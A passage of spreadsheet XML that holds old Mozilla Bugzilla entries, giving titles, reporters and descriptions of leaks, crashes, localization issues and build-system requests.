  </si>
  <si>
    <t>CORE-395845</t>
  </si>
  <si>
    <t>view-source leaks nsCParserNode and nsDeque objects</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) ./firefox about:blank
2) view source
3) quit
Leaks 5 nsCParserNode objects 3 nsDeque objects and some string buffers.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-471050</t>
  </si>
  <si>
    <t>uk / Ukrainian</t>
  </si>
  <si>
    <t>dom/chrome/appstrings.properties contains reference to Firefox</t>
  </si>
  <si>
    <t>Hi
From bug 305998) dom/chrome/appstrings.properties should be application agnostic and that file can be overriden by applications.
For example in en-US locale
fileNotFound string is The file %S cannot be found. Please check the location
and try again. in dom/chrome/appstrings.properties and Firefox can't find
the file at %S. in browser/chrome/overrides/appstrings.properties.
But in ukrainian locale fileNotFound string still references Firefox in
dom/chrome/appstrings.properties .</t>
  </si>
  <si>
    <t>BUGZILLA-452893</t>
  </si>
  <si>
    <t>request.cgi crashes if a flag modification date is invalid</t>
  </si>
  <si>
    <t>Due to a very old bug in 2.20 and older (bug 365264) some flags have a modification date set to 0000-00-00. strptime() doesn't return undef and so DateTime tries to build an object with this invalid data crashing Bugzilla. To fix that we could either let checksetup.pl fix these dates e.g. by setting them to the creation date which is better than nothing or let sanitycheck.cgi find them and offers to fix them using the same workaround as above (maybe safer?) or let Util::format_time() detect the invalid date and return ''.
While testing data passed to format_time() it appears that strptime() sets the month to -1 for 0000-00-00 00:00:00. I have no idea if this is something official we can use or not to detect invalid dates but this could also be a way to fix the problem without altering the DB.
Max which solution do you prefer?</t>
  </si>
  <si>
    <t>SEAMONKEY-101869</t>
  </si>
  <si>
    <t>[ProfileCreation]CA region should not be the default setting in Preferred Content dropdown menu</t>
  </si>
  <si>
    <t>Build: 2001-09-26
Steps:
1. Choice Custom installation with CA ES and GB region packs pre-selected. 
2. After installation run Profile Manager to create a new profile. 
3. In Create Profile dialog click Region Selection button Language/Region 
Selection dialog pop-up.
Actual:
CA region is the default in Preferred Content dropdown menu. Please refer to 
the attachment.</t>
  </si>
  <si>
    <t>ruixu</t>
  </si>
  <si>
    <t>CORE-515211</t>
  </si>
  <si>
    <t>topcrash:[@arena_chunk_init ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 8.0 Windows NT 5.1 Trident/4.0 .NET CLR 1.1.4322)
Build Identifier: http://www.mozilla.com/en-US/firefox/ie.html
since the new firefox update (version 3.5.2)  every time i open firefox the browser freezes for around half an hour and then crashes.  before finishing loading ANY pages.  I've tried at least 7 or 8 times with the same results. 
Reproducible: Always
Steps to Reproduce:
1.open firefox
2.
3.
Actual Results:  
it freezes then crashes minutes later. 
Expected Results:  
it should have done what it was supposed to do.  let me browse the internet.</t>
  </si>
  <si>
    <t>balgus82</t>
  </si>
  <si>
    <t>CORE-78810</t>
  </si>
  <si>
    <t>CreateFixupURI does not handle view-source:www.cnn.com correctly</t>
  </si>
  <si>
    <t>In NS 4.x view-source:www.cnn.com will show the source of http://www.cnn.com
In Mozilla it will not.  This is because CreateFixupURI will convert the above
to http://view-source:www.cnn.com ... it should convert it to
view-source:http://www.cnn.com</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-906342</t>
  </si>
  <si>
    <t>Move the remaining SIMPLE_PROGRAMS to moz.build and disallow it in Makefiles</t>
  </si>
  <si>
    <t>Created attachment 791721
Patch v1</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-205492</t>
  </si>
  <si>
    <t>Browser crashes as it loads the URL [@ nsWindow::NativeCreate]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.1 Linux)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3) Gecko/20030430 Debian/1.3-5
The browser crashes while it's loading the page http://www.gabibbiesaltati.cjb.net/ 
Reproducible: Always
Steps to Reproduce:
1. Load URL http://www.gabibbiesaltati.cjb.net/		 
2. 
3. 
Actual Results:  
browser crashed		 
Expected Results:  
loaded successfully the page 
It crashes on Galeon too so I think it's an engine issue</t>
  </si>
  <si>
    <t>gavrilus</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-458945</t>
  </si>
  <si>
    <t>treehydra: process_tree_type</t>
  </si>
  <si>
    <t>I want process_tree_type just like process_tree_decl... my treehydra world will be complete and it will be much easier to write lazytypes unit tests.</t>
  </si>
  <si>
    <t>CORE-180861</t>
  </si>
  <si>
    <t>Form Submission should not know about PresContext</t>
  </si>
  <si>
    <t>PresContext is 100% about content.  If there is something in PresContext that it
needs either that resource is in the wrong place or there is a substitute in
content world that we can work with.
Three things I see in nsFormSubmission that use it:
- GetBidi() (Simon can you shed light here?  Is there a method in content
somewhere we can use?)
- GetLinkClickHandler is in PresContext but it's really nsWebShell so we can
get the DocShell and QI to nsILinkHandler.  Even *better* might be to put the
method on DocShell and call it something else since we're not really clicking a
link )
- GetEncoding() doesn't appear to need it anymore even though we pass it in. 
Yay :)
The nsHTMLFormElement methods just need it to call into nsFormSubmission.</t>
  </si>
  <si>
    <t>CORE-70091</t>
  </si>
  <si>
    <t>Illegal font is used if specified font-family: gothic</t>
  </si>
  <si>
    <t>Illegal font is used if font-family: gothic is specified
for Japanese text.</t>
  </si>
  <si>
    <t>SEAMONKEY-505672</t>
  </si>
  <si>
    <t>Send unsent messages command doesn't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1
whenever I queue a message in a
POP3 Outbox folder (with CTRL+SHIFT+RETURN) and then try to use send
unsent messages from the menu bar of from the context menu SM simply
sits there without doing nothing.
The SMTP server correctly works because if I set SM to go offline and
again online I'm asked to send the queued message and it is finally
sent. 
Reproducible: Always
Steps to Reproduce:
1. Create a new email account
2. write a new message
3. queue the message (CTRL+SHIFT+RETURN) so that it is displayed in the Outbox folder
4. try to send the queued message by using the main menu or context menu Send unsent messages command.
Actual Results:  
Seamonkey does nothing. No error message and no sending of the email that stays in the outbox folder.
Expected Results:  
The queued message should be correctly sent.
I can reproduce this bug with different type of account (POP3 News) and on several SM build before and after Beta 2.</t>
  </si>
  <si>
    <t>wcdproject</t>
  </si>
  <si>
    <t>CORE-927728</t>
  </si>
  <si>
    <t>Convert PRUnichar to char16_t across the code base</t>
  </si>
  <si>
    <t>I'll do this once bug 895047 sticks.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-562814</t>
  </si>
  <si>
    <t>S*M*A*S*H add-ons developer event logo</t>
  </si>
  <si>
    <t>Sean
Can you help us create the wordmark + logo using the AMO mascot you already have? 
The event name is 
S*M*A*S*H 
Firefox Add-ons Developer Event
brought to you by Mozilla 
It would be great to have the asterix symbols incorporated into the wordmark if you think that looks good.
Thanks
Julie</t>
  </si>
  <si>
    <t>jchoi</t>
  </si>
  <si>
    <t>CORE-214844</t>
  </si>
  <si>
    <t>[FIX] relatively positioned block w/ overflow:auto should be absolute pos. containing block</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030624
An absolute block should be contained by (and so positioned inside or relative
to the selected corner of) the the nearest ancestor with a 'position' other
than 'static' (see CSS2 10.1)
href=http://www.w3.org/TR/REC-CSS2/visudet.html#containing-block-details
EXAMPLE:
#Block2 { display:block position:relative  border-width:2px
border-style:dashed overflow:auto width:auto height:auto  }
#Block3 {  display:blockposition:relative  border-width:2px
border-style:dashed overflow:auto width:100% height:100%  }
#Block4 {  display:blockposition:absolute  border-width:2px
border-style:dashed overflow:auto  left:0  top:0  width:50%  height:auto 
z-index:1 }
#Block5 {  display:blockposition:absolute  border-width:2px
border-style:dashed overflow:auto  left:10  top:50  width:50%  height:auto
 z-index:1 }
Use up space 
If you change the positioning of block 3 to absolute You will see correct
positioning of the children
   this is mispositioned so it cant be seen 
   You can see this but it is mispositioned relative to the top
left of the screen.  It should be relative to the the nearest ancestor with a
'position' other than 'static' (see CSS2 10.1 &lt;a
href=http://www.w3.org/TR/REC-CSS2/visudet.html#containing-block-details&gt;
http://www.w3.org/TR/REC-CSS2/visudet.html#containing-block-details 
Reproducible: Always
Steps to Reproduce:
Just load the example in the browser
Actual Results:  
A block that should be shown is hidden because it is outside of the dimensions
of the containing block.  A block that should be 50 pixels lower and 10 to the
right from the top left of the containing block appears right at the top left (I
chose the 50/10 so you it would appear there)
Expected Results:  
Change block 3 to absolute to see what it should have done (WRT the children).</t>
  </si>
  <si>
    <t>AndyStone</t>
  </si>
  <si>
    <t>BUGZILLA-125516</t>
  </si>
  <si>
    <t>Exim as MTA: -ti doesn't work -&gt; NO EMAIL IS SENT</t>
  </si>
  <si>
    <t>This is the CVS version of Bugzilla
My MTA has problems with the option -ti but -i -t works.
Recently the -i option was introduced which doesn't quit when a single dot is in
a line. But Exim doesn't like the -ti option. It understands the -t -i though.
Patch to come</t>
  </si>
  <si>
    <t>SEAMONKEY-382243</t>
  </si>
  <si>
    <t>SMTP servers not migrated from xpfe profile to suiterunner</t>
  </si>
  <si>
    <t>I had 3 smtp servers defined in my XPFE profile.  None of them were migrated over to my suiterunner profile.  For accounts that listed the SMTP server as  (default) the suitrunner pref panel says Use Default Server while any account that explicitly references a server it says null (Default).  None of the mail.smtpserver.* prefs made it over.</t>
  </si>
  <si>
    <t>FIREFOX-413531</t>
  </si>
  <si>
    <t>tooltips of back menu are all the same no tooltips if right-clicked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b2) Gecko/2007121120 Firefox/3.0b2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b2) Gecko/2007121120 Firefox/3.0b2
When hovering the mouse over an item in the Back drop-down menu (shown after clicking the drop-down arrow) all items' tooltips are Go back one page like the main button.
When hovering the mouse over an item in the Back drop-down menu (shown after right clicking the Back button) no tooltips are shown.
Reproducible: Always
Steps to Reproduce:
(Standard theme Windows XP FF3.0b2)
A1. Click arrow next to Back button.
A2. Hover mouse over any item.
B1. Right-click Back button.
B2. Hover mouse over any item.
Actual Results:  
A. Tooltip shown reads Go back one page.
B. No tooltip is shown.
Expected Results:  
A. Tooltip should show the page address or unabridged page title.
B. Right-clicking should show the same menu as usual rather than a context menu.
These are listed together because they are so closely related and because the solution lies in one common change.</t>
  </si>
  <si>
    <t>kainino</t>
  </si>
  <si>
    <t>MOZILLA.ORG-479056</t>
  </si>
  <si>
    <t>Governance</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/profilemanager</t>
  </si>
  <si>
    <t>broken link found on module owners page http://www.mozilla.org/owners.html</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-427531</t>
  </si>
  <si>
    <t>update bios in About page</t>
  </si>
  <si>
    <t>http://viewvc.svn.mozilla.org/vc/projects/mozilla-europe.org/trunk/en/about/index.html?r1=12021&amp;r2=12020&amp;pathrev=12021
This bug tracks update needed for the about page on mozilla europe localization work will be done on the l10n mailing list. Bug is open to track progress in the web localization dashboard http://l10n.mozilla.org/webdashboard/?project=1.
Of course external patches to help our localizers are welcome</t>
  </si>
  <si>
    <t>MOZILLA_LABS-383310</t>
  </si>
  <si>
    <t>save-as of media from website results in a .html file</t>
  </si>
  <si>
    <t>if I right click on a video on the joey site and select save-as the default file extension shown in the save-as dialog is html.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-516674</t>
  </si>
  <si>
    <t>Incomplete XPI file name version string only</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/de/editors/review/76590?num=103
The XPI linked under all points to:
https://addons.mozilla.org/de/firefox/downloads/file/62424/-1.0.7.5-fx.xpi
and hence has a file name of:
-1.0.7.5-fx.xpi
File name should be something along the lines of the following instead:
quicktoolbars-1.0.7.4-fx.xpi
It's not my extension so I don't know steps to reproduce such an upload.
And I'm not sure if this is fixed already and this extension was just uploaded before any fix was pushed to production. Extension was nominated some time ago: 2009-08-20 13:34:05.</t>
  </si>
  <si>
    <t>BUGZILLA-34172</t>
  </si>
  <si>
    <t>Bug can become unconfirmed even if it has enough votes to be confirmed by votes</t>
  </si>
  <si>
    <t>Bug 32218 was incorrectly marked as resolved fixed and then verified fixed 
and when I reopened it it had three votes.  It ended up in the unconfirmed 
state.  Since the bug was unconfirmed just before becoming fixed my guess 
is that bugzilla missed a popular vote confirmation that should have occurred 
while the bug was marked as fixed (but would only show up if the bug were to 
be reopened).</t>
  </si>
  <si>
    <t>TESTING-789380</t>
  </si>
  <si>
    <t>Mozbase</t>
  </si>
  <si>
    <t>Release moztest mozcrash to pypi</t>
  </si>
  <si>
    <t>Niether moztest or mozcrash are on pypi.  We should release them.</t>
  </si>
  <si>
    <t>k0scist</t>
  </si>
  <si>
    <t>WEBSITES-522161</t>
  </si>
  <si>
    <t>air.mozilla.com</t>
  </si>
  <si>
    <t>New AirMoz theme for Wordpress</t>
  </si>
  <si>
    <t>Created attachment 406142
Air Mozilla Theme for WordPress
Okay I'm pretty sure I've worked out all the bugs. The theme is live at my staging site http://kabloosh.com
If you have any questions do let me know.
Helpful note: the subheader section can do double duty. It can be connected to the Sidebar (Sidebar2 is what you would think of as the ordinary sidebar) if you want to enable widgets or you can go crazy with code in subheader.php to implement Air Mozilla's live stream. The subheader only appears on the main page and will not appear on pages or individual posts.</t>
  </si>
  <si>
    <t>stella</t>
  </si>
  <si>
    <t>CORE-99090</t>
  </si>
  <si>
    <t>New edit rule: Enter/Return when typing in a link should discontinue the link.</t>
  </si>
  <si>
    <t>When typing within a link tag the Enter key should automatically
end the current link tag before inserting the . If there is any more link
content (i.e. we were not at the end of the link) then the folling content
should still retain the link. It seems that would be accomplished by splitting the 
existing link first so the effect is as if the  is inserted between new  
and  tags. We don't want to generate empty  tags at the end though.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-491101</t>
  </si>
  <si>
    <t>Support for archiving symbols along with builds and allow for easy re-upload</t>
  </si>
  <si>
    <t>Tinderbox currently archives a nightly/release build's symbols and the upload script which makes it trivial to re-upload the symbols when upload fails (as it did with 1.6.7).
They live in /builds/tinderbox/$(buildname)/$(host_buildtype)/$(buildid)/symbols/ and /builds/tinderbox/$(buildname)/$(host_buildtype)/$(buildid)/upload-symbols.sh (other children of $buildid are packages/Camino.dmg and upload-packages.sh).  Not sure what those variables actually are in tinderbox code though.
The code for archiving the symbols is in the super-secret Talkback Makefile and is run as part of the Makefile target for generating and uploading the symbols so perhaps we could add an equivalent action to our own uploadcaminosymbols target basing it on the build-archiving process in tinderbox (the Talkback Makefile is NPL-only so we can't really copy it per se).  
The code for archiving the build in $(buildid)/packages/ and generating $(buildid)/upload-packages.sh (and later pruning those dirs) is 
http://mxr.mozilla.org/seamonkey/source/tools/tinderbox/post-mozilla-rel.pl#1481 and 
http://mxr.mozilla.org/seamonkey/source/tools/tinderbox/post-mozilla-rel.pl#1139
though.
Ideally we'd also warn (maybe fail?) on symbol-generation failure and warn on symbol-upload failure e.g. something like 
http://mxr.mozilla.org/seamonkey/source/tools/tinderbox/post-mozilla-rel.pl#1425
http://mxr.mozilla.org/seamonkey/source/tools/tinderbox/post-mozilla-rel.pl#1499
or 
http://mxr.mozilla.org/seamonkey/source/tools/tinderbox/post-mozilla-rel.pl#1461</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-458781</t>
  </si>
  <si>
    <t>1 nsStringBuffer leak triggered by test_bug353415-1.html test_bug353415-2.html test_bug392567.html and scriptaculous/...</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9.1b1pre) Gecko/20081004 SeaMonkey/2.0a2pre] (home optim default) (W2Ksp4)
|python runtests.py --autorun --close-when-done --leak-threshold=21493|
After working around bug 391318
{
TEST-PASS | runtests-leaks | WARNING leaked 8 bytes during test execution (under threshold set at 21493 bytes)
TEST-PASS | runtests-leaks | leaked 1 instance of nsStringBuffer with size 8 bytes
}
remains.
This leaks appears with any one of these tests
running more than one test does not leak additional strings.
The tests are in
content/html/content/test/...
	test_bug353415-1.html test_bug353415-2.html test_bug392567.html
and
dom/tests/mochitest/ajax/scriptaculous/... [I did not narrow which one(s).]</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-478389</t>
  </si>
  <si>
    <t>Non US/UK keyboard support is poor</t>
  </si>
  <si>
    <t>From watz on the mailing list:
For example the alt gr key doesn't work which makes it impossible to enter certain characters on a German keyboard (like curly braces). This makes editing code currently quite impossible :-) Also characters not present in an US layout don't work (German Umlaute like Ã¤Ã¶Ã¼). Keys that work produce characters matching the layout however. It just looks like bespin alpha implements some own keycharacter translation logic for the editor that still needs internationlization support.</t>
  </si>
  <si>
    <t>CORE-499777</t>
  </si>
  <si>
    <t>Cannot convert WrappedNative to function (NS_ERROR_XPC_CANT_CONVERT_WN_TO_FUN)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X 10.4 en-US rv:1.9.2a1pre) Gecko/20090621 Minefield/3.6a1pre
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X 10.4 en-US rv:1.9.2a1pre) Gecko/20090622 Minefield/3.6a1pre
Get this bug every time I try to extend Event using MooTools or jQuery with the nightly builds since the 22nd of June:
exception: [Exception... Cannot convert WrappedNative to function  nsresult: 0x8057000d (NS_ERROR_XPC_CANT_CONVERT_WN_TO_FUN)  location: JS frame :: http://xxx/js/main_mootools_core.js :: anonymous :: line 2028  data: no]
The 21st is dandy so I checked the checkins for that night and it appears to be because of this:
http://hg.mozilla.org/mozilla-central/rev/dca035c2bb32
That changeset links to a private bug #498897 which I'm guessing is hidden for security reasons.
Reproducible: Always
Steps to Reproduce:
1. Navigate to http://www.stufftodo.com.au/.
2. Submit the form on the home page which searches the map.
3. The JavaScript should catch the form submit event using MooTools.
Actual Results:  
Seems to crash and burn on most event handlers with the above error.
Expected Results:  
Should catch the event and continue executing the JavaScript.
Seems to point to this line in MooTools Core the line it fails on every time:
event = new Event(event self.getWindow())
which is inside the AddEvent method that gets tacked onto Element Document and Window.</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-359274</t>
  </si>
  <si>
    <t>Toolbar: Ability to add menu items and recipients to the toolbar</t>
  </si>
  <si>
    <t>Penelope needs the ability like Mac Eudora to add any menu item to the toolbar. This makes it possible to create a toolbar button for almost every action in Eudora. Penelope needs the same ability. This combined with the Mailbox and Transfer menus gives the user the ability to put any mailbox (or transfer to mailbox action) onto the toolbar.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-254074</t>
  </si>
  <si>
    <t>Update Image Zoom Extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.2
Update Image Zoom extensions on update.mozilla.org with the version 0.1.6
The new xpi file is available at
http://www.yellowgorilla.net/imagezoom/imagezoom_0.1.6.xpi
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>jason_nospam</t>
  </si>
  <si>
    <t>SEAMONKEY-194677</t>
  </si>
  <si>
    <t>Crash when attempting to choose a certificate in Account Settings</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030210
When you attempt to select a certificate for signing (and probably encryption as
well) mozilla crashes instead of displaying the certificate selection screen.
Reproducible: Always
Steps to Reproduce:
1. Edit -&gt; Mail &amp; Newsgroup Account Settings (IMAP mail account) -&gt; Security -&gt;
Digital Signing -&gt; Select (certificate) causes a mozilla crash everytime
Actual Results:  
Browser crash. Appears to be identical to Bug # 152800. That bug was marked as
fixed in mozilla 1.1a (BuildID 2002061104) but it is again clearly reproducable
in 1.3b
Expected Results:  
Display a screen to allow me to select a certificate
Tried submitting talkback crash report but talkback doesn't seem to be able to
connect at all! Gives error The agent is unable to connect to the server.
Please check your proxy settings or try again later. Not using proxy and tried
multiple times over a 3 day period.</t>
  </si>
  <si>
    <t>racham</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-515417</t>
  </si>
  <si>
    <t>do major update from Fx3.0x to Fx3.6x to make sure it all works</t>
  </si>
  <si>
    <t>We'll need major updates generated in order to test prior to the 3.6 release.</t>
  </si>
  <si>
    <t>jbecerra</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-275424</t>
  </si>
  <si>
    <t>some typo corrections on the dutch tech evang page</t>
  </si>
  <si>
    <t>As a follow up to bug 266310 and bug 209458 i fixed some dumb typos on the dutch
tech evang page.
Attaching the output from doctor in a second. Can someone check that in for me?
Thank you :)</t>
  </si>
  <si>
    <t>CORE-185247</t>
  </si>
  <si>
    <t>HavePrivateHTMLFlavor should not return PRBool</t>
  </si>
  <si>
    <t>IMO nsHTMLEditor::HavePrivateHTMLFlavor should return nsresult instead of PRBool.
That is the function should looks something like this:
nsresult 
nsHTMLEditor::HavePrivateHTMLFlavor(nsIClipboard *aClipboard
                                    PRBool* aReturn)
{
  *aReturn = PR_FALSE
   NS_ENSURE_ARG_POINTER(aClipboard)
   nsCOMPtr flavArray
   nsresult res = NS_NewISupportsArray(getter_AddRefs(flavArray))
   if (NS_FAILED(res)) 
     return res 
   nsCOMPtr contextString(   
do_CreateInstance(NS_SUPPORTS_CSTRING_CONTRACTID 
   if (contextString)
     contextString-&gt;SetData(NS_LITERAL_CSTRING(kHTMLContext))
     ...
   }
....
}</t>
  </si>
  <si>
    <t>CORE-183768</t>
  </si>
  <si>
    <t>Crash in nsWindow if mouse clicked before parentWidget is available</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
 HWND parentWnd = ::GetParent(mWnd)
    if (parentWnd) {
      nsWindow* parentWidget = GetNSWindowPtr(parentWnd)
      if (parentWidget-&gt;mIMEIsComposing &amp;&amp; nsWindow::uWM_MSIME_MOUSE) {
parentWnd is valid but parentWidget is NULL... crashola...
Happens if you click on the gecko view window too soon.
Reproducible: Always
Steps to Reproduce:
1.Launch a gecko viewer
2.click on the window immediately after its viewable
3.
Actual Results:  
Crash
Expected Results:  
return</t>
  </si>
  <si>
    <t>angelon</t>
  </si>
  <si>
    <t>CORE-246999</t>
  </si>
  <si>
    <t>Page layout is incorrect on reload</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Prior to the 0.9 release I've never seen this bug show up.  After installing
0.9 the forum on this page displays wrong.  Now the menu side column takes up
the whole page with the actual forum threads off to the right.  If you
continuously click the Forum link in the navigation menu on the website
occassionally it will display correctly.
Reproducible: Sometimes
Steps to Reproduce:
1.  Visit the URL: http://www.tastybrew.com/forum
2.  If it displays ok click the Forum link to see if it displays incorrectly.
3.  If it displays incorrectly click the Forum link to see it display
correctly sometimes.
The same problem occurs on Linux (Gentoo) using the precompiled 0.9 release.
I'm curious if either it is a bug in the website that recent changes to the
rendering make visible.  Or if some recent changes to the rendering have a bug.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-281119</t>
  </si>
  <si>
    <t>Warning ``assignment to undeclared variable seq'' [xs] in file ``chrome://inspector/content/jsutil/rdf/RDFU.js'' line 86 character 0.</t>
  </si>
  <si>
    <t>Warning ``assignment to undeclared variable seq'' [xs] in file
``chrome://inspector/content/jsutil/rdf/RDFU.js'' line 86 character 0.
Stopped for error handler.
#0: function anonymous(aDS=XPComponent:{35}
aResName=string:inspector:viewers) in
 line 86
084: try {
085: var res = gRDF.GetResource(aResName)
086: seq = this.makeSeq(aDS res)
087: } catch (ex) {
088: alert(Unable to find sequence: + ex)</t>
  </si>
  <si>
    <t>CORE-492150</t>
  </si>
  <si>
    <t>Unexpected error occurred when javascript.options.strict is true</t>
  </si>
  <si>
    <t>This is reported to bugzilla-jp and contributors checks this bug.
See the testcase: http://bugzilla.mozilla.gr.jp/attachment.cgi?id=4029
&gt; 
&gt; 
&gt; try {
&gt; 	throw 'foo'
&gt; }
&gt; catch(e) {
&gt; 	var e = 'bar'
&gt; }
&gt; document.write('OK')
&gt; 
&gt; 
If the catch block defines var with defined name the line throw an error *only* when javascript.options.strict is true.
Sakai-san proposes a patch:
http://bugzilla.mozilla.gr.jp/attachment.cgi?id=4030&amp;action=diff
He guesses that this is a mistake of bug 487209.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-438743</t>
  </si>
  <si>
    <t>series drop downs don't use same naming rules (new front end)</t>
  </si>
  <si>
    <t>On graphs.mozilla.org/g2/graph.html there are naming conventions in place to convert tp_loadtime_avg to Tp3 (in the tests list).  These conventions are not used at all on graphs.mozilla.org/g2/graph.html#type=series.  We should have consistent naming conventions across both pages.</t>
  </si>
  <si>
    <t>CORE-319854</t>
  </si>
  <si>
    <t>Firefox crashes on redirect after Firefox-warning [@ DocumentViewerImpl::PermitUnload]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8) Gecko/20051111 Firefox/1.5
At http://www.mozbrowser.nl/forum/viewtopic.php?t=5645 a bug in Firefox is mentioned. Someone browses to a webpage that does not exist anymore. Therefore the hosting provider (Lycos) redirects to their portal (www.jubii.dk). Firefox asks whether the user wants to 'close the page' (sounds like a warning before a Javascript window.close or something) and redirects. But before the new page is completely build Firefox crashes.
Reproducible: Always
Steps to Reproduce:
1. Browse to http://medlem.jubii.dk/easyastth/kazaa%20lite%20resurrection/kazaa%20lite%20resurrection.html with Javascript enabled
2. Wait for the warning from Firefox
3. Click OK or Cancel and watch Firefox crash
Actual Results:  
Firefox crashes
Expected Results:  
Redirect is performed without problems.
To narrow the problem down:
When one uses the Escape-key to cancel the Firefox-warning no crash happens. But when one clicks on Cancel the browser still crashes. People who block Javascript do not have a problem. People who use Linux also report no problems. This is also reported with Firefox 1.0.7 on Windows9x.</t>
  </si>
  <si>
    <t>weisbeek</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-487477</t>
  </si>
  <si>
    <t>abcasm/abs_helper.abc can be invoked before its finished building causing an abcasm failure</t>
  </si>
  <si>
    <t>Error Msg:
Failed due to: abcasm/globalSlot.abc : captured output: unknown file
format: abcasm/abs_helper.abc
From Brent:
I believe it was speculated that it may have been a timing (threads)
issue. Since the abc_helper.as is NOT compiled when ./runtests.py
--rebuildtests is run that means that it is compiled the first time that
a test is run that needs it. Since we run with multiple threads it is
possible that 1 thread sees that it needs to compile the helper and
while asc is writing out the abc file and other thread tries to run a
test that needs the helper and sees that it exists but actually isn't a
complete abc file... yet.
Possible solutions:
- Add new 'compile-only' directive to testconfig.txt so that the abc gets compiled w/ all the other abcs.
- Checkin the abc directly
- Run as a test w/ expectedfail (clunky)</t>
  </si>
  <si>
    <t>brbaker</t>
  </si>
  <si>
    <t>cpeyer</t>
  </si>
  <si>
    <t>MOZILLACLASSIC_GRAVEYARD-791</t>
  </si>
  <si>
    <t>Windows FE</t>
  </si>
  <si>
    <t>ss:crash on startup</t>
  </si>
  <si>
    <t>This is probably a known bug so forgive me if you've seen this one a hundred
times.
Using the latest build of mozilla binary it crashes on startup and a dialog box
appears with this message:
Assertion Failure
y\nightly\mozilla\modules\rdf\src\nlcstore.c
Line 163.</t>
  </si>
  <si>
    <t>snedigar</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-494353</t>
  </si>
  <si>
    <t>Treehydra - can't insert after einline_ipa</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/4.2 Linux) KHTML/4.2.3 (like Gecko) Fedora/4.2.3-2.fc9
Build Identifier: 
When running the unit tests for dehydra against gcc trunk I get this:
$ /home/bradh/devel/gcc-build/gcc/cc1plus -quiet -O2 -fdump-ipa-all -fplugin=../gcc_treehydra.so -o /dev/null -fplugin-arg-gcc_treehydra-script=test_ipa.js locks_good.cc                    
cc1plus: error: Failed to position pass treehydra registered by plugin gcc_treehydra. Cannot find the (specified instance of) reference pass einline_ipa                                                          
locks_good.cc:1: error: Did not see functions I wanted in the input file
The test case tries to use einline on gcc42 and einline_ipa on later versions. If I change it to use einline_ipa only on gcc43 it works OK. That is I can insert the dehydra plugin after the einline pass but not after the einline_ipa pass.
I do have a patch that works around this (essentially reversing the logic:
require({ after_gcc_pass: isGCC43 ? 'einline_ipa' : 'einline' })
however I'm not confident about this one. It does make the test pass though...
It feels like I might be working around a problem that should be fixed in gcc instead. Or perhaps we have the wrong command line options and that early inline IPA pass isn't being run.
Reproducible: Always</t>
  </si>
  <si>
    <t>bradh</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-201308</t>
  </si>
  <si>
    <t>[Webclient] support nsIWindowCreator::CreateChromeWindow</t>
  </si>
  <si>
